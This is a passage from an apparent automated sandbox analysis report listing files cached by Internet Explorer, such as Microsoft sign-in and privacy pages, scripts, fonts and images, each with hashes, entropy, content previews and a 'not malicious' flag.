Preview: wOFF......Wh.......|........................OS/2...X...H...`JZ.:VDMX.............^.qcmap............R..cvt ....... ...*....fpgm...........Y...gasp................glyf......G-..{2D.;.head..N....2...6....hhea..O........$$..|hmtx..O(.........yM.loca..O....~...~@l!.maxp..Qp... ... .Q..name..Q....6....`..Upost..V........ .Q.wprep..V.........x...x.c`..g......:....Q.B3_dHc..`e.bdb... .`@..`......./9.|...V...)00...d.Xx...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...]L.a...._9u.._...=T.a..B.1..G.n|..f.....a..D4...L...*5..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Size (bytes): 262788
Entropy (8bit): 4.719009857910025
Encrypted: false
MD5: 3850E04FBF51070B1AE70482472A8998
SHA1: 5136F76A01B24FE8D887CB5E4AE4D6490456811C
SHA-256: D20B8DF276BB85BC6D8D58F0BF2724B761C162B91428F4FBB3A3E14E748A4E26
Copyright Joe Security LLC 2019 Page 26 of 47
SHA-512: 60E6418E613BBDC361DACC689DF108CFD31B214215EDD9CE8804497AFAD872FDA1ACBB6ED033173EABA888E82BF737A619923F9CF0245C76CEE7363788E17AFA
Malicious: false
Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><link rel="shortcut icon" href="https://www.microsoft.com/favicon.ico?v2" /><script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.11.2.min.js">.....// Third party scripts and code linked to or referenced from this website are licensed to you by the parties that own such code, not by Microsoft. See ASP.NET Ajax CDN Terms of Use - http://www.asp.net/ajaxlibrary/CDN.ashx... </script><script type="text/javascript" language="javascript">/*<![CDATA[*/if($(document).bind("mobileinit",function(){$.mobile.autoInitializePage=!1}),navigator.userAgent.match(/IEMobile\/10\.0/)){var msViewportStyle=document.createElement("style");msViewpo
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\privacystatement[1].htm
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\reprocess[1].htmProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Size (bytes): 16399
Entropy (8bit): 5.53187594715885
Encrypted: false
MD5: 39ACCF5CA385E64C9F9EAE801DF34CAF
SHA1: 1F6EFA75F54F5A08E18FDC4C5F122EE725916932
SHA-256: 9D7213DFAA186B9D7620B57151FE3BE007678AEC0DAC0D24205448B83F300279
SHA-512: FF1CE433DB26D9079E05CE28ED35FEC482920D22F1CC16B44EB1094689D421C026E932501C378D2E3C6BD1D48F8407DA75225459963F4A9D99808612D422C6A7
Malicious: false
Preview: ....<!DOCTYPE html>..<html dir="ltr" class="" lang="en">..<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. .. <meta name="PageID" content="ConvergedError" />.. <meta name="SiteID" content="" />.. <meta name="ReqLC" content="1033" />.. <meta name="LocLC" content="en-US" />.. <noscript>.. <meta http-equiv="Refresh" content="0; URL=" />.. </noscript>.... .. <link rel="shortcut icon" href="https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico" />.. .. <meta name="robots" content="none" />....<script type="text/javascript">//<![CDATA[.$Config={"strHeaderText":"Sign in","uns
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\style[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 816
Entropy (8bit): 4.949897846622861
Encrypted: false
MD5: 853BD04891E53E62DCC5EB93DC2D895E
SHA1: 7A77B42B76C1DCA1A526273E7A18738020E0290B
SHA-256: 26F6807B674D6A4CAAEDA21C3E3A5DAF0A018828FF045026B6306E9414EE0E47
SHA-512: FEEA2A298EB9B6EDD0CF5DC3D6473B9F280409147E4722D87C898ACC344566543CCDE986EA1CDBF717EEFF943147C8BC03C7FCF86A386EA4D62211A1E55B0D93
Malicious: false
Preview: body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid{max-width:1600px !important}.js-global-head .c-uhfh-gcontainer button.glyph-global-nav-button{display:none}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with CRLF, LF line terminators
Size (bytes): 306089
Entropy (8bit): 5.466321305176346
Encrypted: false
MD5: 1AF095F9F7CAE6E78993BFBCCEC6667C
SHA1: CE3DE4032609A71B606AF35117D869C8DE0B80D8
SHA-256: E187E07E550C6C4204CFD912A23199C55BCF30FA76D20AB58ECDF2CD75CA5BCD
SHA-512: 11EB56F41CD094A7FFE5CCE756741148914C11E5C1EEDDF9CAE4DE960C8830D621AF201187F5BD8056152766B76EA30A298C0467F135205968A93934BFBAC6AD
Malicious: false
Preview: /*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------.. * .. * This file is based on or incorporates material from the projectslisted below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise... * .. * json2.js (2016-05-01).. * https://github.com/douglascrockford/JSON-js.. * License: Public Domain.. * .. * Provided for Informational Purposes Only.. * .. * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.!function(e){function t(n){if(i[n])return i[n].exports;var a=i[n]=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x28, frames 3
Size (bytes): 101292
Entropy (8bit): 7.8172319338881335
Encrypted: false
Copyright Joe Security LLC 2019 Page 27 of 47
MD5: D365F16C9A53DD752036CD8FB2591EEB
SHA1: 02C216E6A002834ADA9FBEEEE1401E7844587A03
SHA-256: 0DB3C3AD031F72C1404D7B7613971547299E27AD1B70FAABBB972E799EF01206
SHA-512: 1E6145EF39C72830CE7D483B88F6B5A183994044E2901729263614913A618D9396A3C6F893413D911B3FFA8AA565DEED3FBD297E7FF43F9561D94F673FC72015
Malicious: false
Preview: ......JFIF.....H.H.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpg
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 267298
Entropy (8bit): 7.984423733048217
Encrypted: false
MD5: 03A70BDE53DD775BF2798438F52E430A
SHA1: 37942898606FC0B94BF810181C03A11FC4483250
SHA-256: D6CF9E1F9EE42A9E3F00C701EBC4B39458402376E5D0EFE616F3E8C0E55A6FD4
SHA-512: 7E2247A421B8A7F2E2463D9627881DCAC95F95C32180041BF85E63F4A13807FBCF8897FCFCAFD1C7270D90BD56FFCA4635380E42E4A8BC642DA9F9755EB79A8A
Malicious: false
Preview: ...7d........x...(..^Wxo...d.xp(}.7ba.....^K....&LX..d..../%.a....W...@.....&...F...7d..Z......u..`.]xo(2..`.2...#..~...8.C.K....^M.qb..v.L....&.X..%..-.....d...Z.X.C^L.qb...L.Z.&L....^L5......V[!0....d.L..b.Ll.a.4..0........2..3h.....L.FI......&PL.2`.&L...&.2d...&..)/..b1H.;.....f....y..#2.C.`..%d.TM.%....X...X9.g.Z..rd.X.K.x/.Z.../.(k.x./.Z..n.......&..J..1b.y/.&,Pwd...(m.w.K.x.C..O.%.X....K..J..^-.Yhk.c..^,P./..Y(;.^-..=.[..(k..v...L...b.....n.d.....-...o...C.....-.y/..^,P..7d.....vM.P./..^,P....^,P...o........[%.Qe.vM...o..vM....n..%...K...C.K..%.P..v%.J..n9]..7`.x7`P.n..d.C..y].({.x.......K.x.G....2X..4Yc%.K.x....K.y.=....>./%..^..^L..vM.]....weW..R..7ew...7a..K.K7d.y/..vM.]..vM.U.P-.~U..@.~..]..7..r..x.Y.&.K.x..o.*.7....o......7...c%.f..|....[..........~M...%...w.w..@.~M.].P,.~Wc%[email protected].].QK|L>&[email protected].........).x....|\.v..@.....[.M..........o....la..].).d..]...NSc%......
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0_a5dbd4393ff6a725c7e62b61df7e72f0[1].jpgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 185065
Entropy (8bit): 7.980943347042259
Encrypted: false
MD5: 46FEA73CD8377663DF7A840E9DEBF599
SHA1: 1FC10AD6A21A92C95C19A96878BD7BACC89EACFE
SHA-256: F38E56F2352DE13B5DFEBD579BD2DE87B81B61CB5DE6CB717DF65169D828D065
SHA-512: 82C92CE9F1ADAF7C0F06B06810BEF828600ECD392E25C1743A564545A91BBFD443512B89DE26966C0F31A331B4C865D778CA702AA8A897246C134E57EC01E902
Malicious: false
Preview: 1dRA.c..U.F.Gh7xj...g..tS.RP.27.O... b$(.BHO7Co..!A.o....=....L..)2....>....to$..b-..0a.O.f.(....W.^..D..>.V,..........g=iE%}=A&s...GP.W...p.."......lG.@<....?S.F.X...Tx.H|P.._"...h:g..N?..J.S"..=.[oP.....t...zC...Y.2..(......[a..f}&...HX..#[email protected].............}9..&../.XJ.j..s.8..9..7...<.......oq...f.!.Q...U.Y.X..V....pf.0H.v....[>...,......)......]>.I..'..6uE.E..9..vn..|D......U..AA.iC...z...L...i^y...~.......Q.q^i.......!.....h.yU.(........M...#[.n.F.E...VBG.C......b..:G.2.4m......w.nW...:t..9.wPe...?.t.B.x.l.123Yq..........zU...vY....O,.?....]@$..O7N.+..T.q...@lro.+..v..}.?...B.h.7..r..E.....y.Z...u..Q.q.LR&.S.pP...N..[.~..B.....$).v........)3|F(.G.k.)x....X~W.4..Y&[email protected])..4....r....j%a.}.}......W.r1.n........<....uuZ.........O,L.6..L..w`Y#...l.r..m&....4....`.jo/.Ls.G....[hB...w}[email protected]..._...t.&..~........1...#........X..T4.....-..[..TM,.,`.HN.[.......v'Nw8.|r~P.z.Y..\:}f.P.8.O..
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\NewErrorPageTemplate[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1612
Entropy (8bit): 4.869554560514657
Encrypted: false
MD5: DFEABDE84792228093A5A270352395B6
SHA1: E41258C9576721025926326F76063C2305586F76
SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious: false
Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].pngProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Size (bytes): 4054
Entropy (8bit): 7.797012573497454
Encrypted: false
Copyright Joe Security LLC 2019 Page 28 of 47
MD5: 9F14C20150A003D7CE4DE57C298F0FBA
SHA1: DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
SHA-256: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
SHA-512: D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
Malicious: false
Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].png
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2[1].cssProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 96088
Entropy (8bit): 5.290692297364742
Encrypted: false
MD5: 7B634B9A5338663077D64B7E15859ADD
SHA1: 971C4049EA8572EF67426E929676B6C6402782DD
SHA-256: 0581D38458F25293B820B01FE058C1DAF8B2365CE6198BB43EC95385B4ECDD79
SHA-512: FF5D0696D2523D61915CFDFAB0F7DCF8562FA42E2731E1D79E62F32D82760D48A0CC466A5742795ED8F8A53C6A2AF140CE734A16929A176B4562C5FB97F1C8A7
Malicious: false
Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. ..//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\errorPageStrings[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\favicon[1].icoProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
Copyright Joe Security LLC 2019 Page 29 of 47
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 12105
Entropy (8bit): 5.451485481468043
Encrypted: false
MD5: 9234071287E637F85D721463C488704C
SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious: false
Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\icons[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), icons family
Size (bytes): 18519
Entropy (8bit): 7.668180326917825
Encrypted: false
MD5: C443B409CE8632A587760F940862748F
SHA1: B1A8B7B8B6B1D4A436B36598D4BD73936BABD639
SHA-256: 39C39A6744CF958E497D3D0A2120F4A7BC0124359231C39E4EDF2387146B0F05
SHA-512: F1593347AC31D6D3B4F904341090B50FE6783F95A4FF2BFED5A96660F4DEF2BBE30DBE3D5EB9EE1DD0D603CFF73E219698B49F1FF35F8228F5B6F34F3C8259BF
Malicious: false
Preview: $.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/[email protected]...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............|.......|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\latest[1].eotProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 20916
Entropy (8bit): 7.972782105593206
Encrypted: false
MD5: 1BB0A7EC21A09DA6473E9423345D6FEB
SHA1: 71FF957FBB5A00BF417573C1EC51CB20E89DBF4B
SHA-256: 095C35B21BB3328173E2E6BFF0772CD25488820C7FD3505915D19858E31D60F7
SHA-512: 4E436297FFF3E18E0190DD8457418999327D94CC50328EE9889460FC2F58DEA7E34A89FD796F84A6604066EB8BC14437DDF5689D6947651889CB2A472ABEE01A
Malicious: false
Preview: R...F...._..".)..2..#.\IDj*..z"..*%..#.M........<!....w.$.?.<3'...\.......5$6)O.2.r.K7............s..p...c@.)8.B.9i..<.].....v....:}.....ej.N..c..G.2.4W..0Z..!../[email protected]?.....B8-..&..t%....<TB..N.........IQ...R.....L....>.y..{E:0lB+NA.3aF.......#|..!..9..\;....M....[0XI...2.Y.8.K.E...K.-.....?.t>...!%$.Q.......b<...\K#.......DK.....mS...[...<.....".I....W..$."...)..wh..Cr.ch...+.....Cc.n..6....-T.r.{[email protected] .g..q.P.pW..'.9.*..|!.A.n...D<.....h9p......*..l..I....o<.6....x.1....6..F..ce.*a]..B.5..d0..fP..6"..|v.ff^.=.,./..@..=...D.. .././v....$f[..?....p .G.S.......d.n.%.[...-&.*.E..j.-..G....f.....Y.Q.n...`.;..U.L......{\5@\.I..F....".Bv.m......H.X.......~. ...Y.....[.r.$L...7.B6...+-.3!..aZkh...}.n.9...e.7..F..F"....~.......QH}..)E../d.Z..X...%....Y.I5l8_..."b....,q.pd.........].#?.qmy...........*..v64...)j..6.\..%.$....E]..`.....z..J....F.m$Y.....6.....p.,,....|....R&L]..WB.q..<.|>.uN..MR.87
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2[1].jsProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 5842
Entropy (8bit): 5.270910508242207
Encrypted: false
MD5: F63DE116518C387CE1B74E2AFEDF1D39
SHA1: E62100D00AC32F5C078E49CB1E3E744310FBEE9C
SHA-256: 2D61BD15CBF2528D2CECB823946C092DDA370E2D41EE68A888E0323E1DAFDF7A
SHA-512: 40FBF92B222C41ABC52D58DA755E2C43673DA501228FD61E1EB0267FFB8930BDBD1355E7527D6FBCEA8971CED999A04BF89727AB1758961B7FFD06490CE8B759
Malicious: false
Preview: function registerNamespace(){for(var e=arguments.length,t=0;e>t;t++){for(var r=this,o=arguments[t].split("."),n=o.length,a=0;n>a;a++){var i=o[a];r[i]||(r[i]=function(){}),r=r[i]}}}!function(){function e(e,o,n,a,i){var s=this,f=null,l=null,c=!1;try{f=t.external}catch(u){}try{l=t.webkit&&t.webkit.messageHandlers||null,c=null!==l}catch(u){}s.getPropertyBag=function(){if(a){if(i&&"undefined"!=typeof Storage&&"undefined"!=typeof JSON&&sessionStorage.property){return JSON.parse(sessionStorage.property)}var e=s.getCookieValue("Property");.if(e&&"undefined"!=typeof JSON){return JSON.parse(e)}}return null},s.getProperty=function(e){var t=null;try{t=f.Property(e)}catch(r){if(a){var o=s.getPropertyBag();o&&(t=o[e],t="string"==typeof t?decodeURIComponent(t):t)}}return t},s.setWizardButtons=function(t,r,o){try{if(!e){if(c){var n={"IsBackEnabled":t,"IsNextEnabled":r,"IsLastPage":o};l.SetWizardButtons.postMessage(JSON.stringify(n))}else{f.SetWizardButtons(t,r,o)}}}catch(i){a&&(s.setCookieValue("Page"
Copyright Joe Security LLC 2019 Page 30 of 47
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svgProcess: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 3651
Entropy (8bit): 4.094801914706141
Encrypted: false
MD5: EE5C8D9FB6248C938FD0DC19370E90BD
SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path 